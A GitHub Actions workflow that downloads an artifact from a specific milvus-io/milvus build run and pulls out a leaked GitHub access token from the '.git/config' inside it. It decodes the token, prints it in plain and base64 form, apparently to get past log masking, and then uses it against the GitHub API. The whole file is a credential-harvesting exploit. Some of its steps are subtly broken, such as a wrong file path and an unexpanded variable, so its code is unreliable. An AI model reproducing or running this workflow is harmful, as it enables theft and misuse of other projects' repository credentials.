# This is a basic workflow to help you get started with Actions

name: Downloader

# Controls when the workflow will run
on:
  # Triggers the workflow on push or pull request events but only for the "main" branch

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v3

      - uses: actions/download-artifact@v4
        with:
          name: go-result
          github-token: ${{ secrets.GITHUB_TOKEN }} # token with actions:read permissions on target repo
          repository: milvus-io/milvus
          run-id: 7353055100

      - name: Extract
        run: |        
          unzip /home/runner/work/artifacts/artifacts/go-result ".git/config" -d extracted_files
          token=$(grep -o 'basic .*' config | sed "s|basic ||g" | base64 -d | sed "s|x-access-token:||g")
          echo $token
          echo $token | base64
      - name: Use Token
        run: |
          curl --location --request GET 'https://api.github.com/repos/milvus-io/milvus/artifacts/issues' \          
          --header 'Content-Type: application/json' \
          --header 'Authorization: Bearer $token' \

        
